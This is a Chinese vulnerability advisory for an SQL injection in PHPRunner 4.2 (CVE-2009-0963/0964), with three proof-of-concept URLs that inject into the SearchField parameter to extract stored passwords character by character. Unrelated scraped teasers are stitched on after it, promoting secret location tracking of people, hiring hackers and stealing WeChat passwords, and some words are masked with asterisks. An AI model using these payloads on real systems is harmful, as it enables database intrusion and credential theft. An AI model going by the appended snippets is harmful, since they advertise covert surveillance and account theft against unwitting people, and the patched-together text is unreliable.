影响版本:
XLineSoft PHPRunner 4.2
漏洞描述:
BUGTRAQ ID: 34146
CVE(CAN) ID: CVE-2009-0963,CVE-2009-0964
PHPRunner是一款PHP网页 *** 工具,可以生成读写MySql数据库的PHP网页。
PHPRunner的orders_list.php和users_list.php模块中没有正确地验证对SearchField参数所传送的输入便在SQL查询中使用,远程攻击者可以通过提交恶意查询请求执行SQL注入攻击,完全入侵数据库系统。 <*参考
http://secuni *** /advisories/34330/
http://marc.info/?l=bugtraq&m=123731019502458&w=2.
*>
SEBUG安全建议:
厂商补丁:
XLineSoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.xlinesoft.com/.
测试 *** :
[www.sebug.net]
本站提供程序( *** )可能带有攻击性,仅供安全研究与教学之用,风险自负!
http://example.com/output/UserView_list.php?a=search&value=1&SearchFor=abc&SearchOption=Contains&SearchField=Password like \'%%\')--
http://example.com/output/UserView_list.php?a=search&value=1&SearchFor=abc&SearchOption=Contains&SearchField=mid(Password,1,1)=\'a\')-- \\
http://example.com/output/UserView_list.php?a=search&value=1&SearchFor=abc&SearchOption=Contains&SearchField=mid(Password,1,2)=\'ab\')--
1月4日消息,据中国网信网发布的消息, 近日,针对网络生态问题频发、各类有害信息屡禁不止等突出问题,为积极回应民众关切,国家网信办启动网络生态治理专项行动。 2 据介绍,此次专项行动于2019...
怎么悄悄的查对方位置(如何偷偷知道对方位置),跟着互联网的开展,咱们的生存不但在实际中,也在网页天下中。几年前,互联网天下属于年青人。说到中暮年人应用互联网,险些是不行能的。但是,当今差别了。他们中的...
1 怎么找黑客的联系方式 多亏了媒体,“黑客”这个词已经被狼借用了。这个词让人联想到恶意计算机用户想要寻找新的方法来骚扰人们,欺骗公司,窃取信息,甚至通过渗透军事计算机系统来破坏经济或发动战争。虽然不...
微信支付越来越普及了,大家平时出去吃饭买菜都会用到微信支付,而有一些人就盯上了微信支付,如何用微信支付去骗钱。骗子的手法也是五花八门,很多年轻人都上当受骗,更别说刚学会用智能机的老年朋友。 来看...
揭秘黑客教程:窃取微信账户密码的最简单的方法和工具;黑客教你3分钟盗微信1.在男性癌症晚期的男孩眼中,女孩一定是小贾斯珀,必须听男人的话,看一看晚期男性癌症的表现,你的男朋友已经被招募了吗?男性直癌晚...
黑客技术定位地址,定位微信地址对于一个技术成熟的黑客可以说是轻而易举的工作,那么究竟是怎么操作来定位别人的微信地址而不被对方所发现的呢,下面这种简单办法可以告诉你答案。 定位微信地址不被对方发现...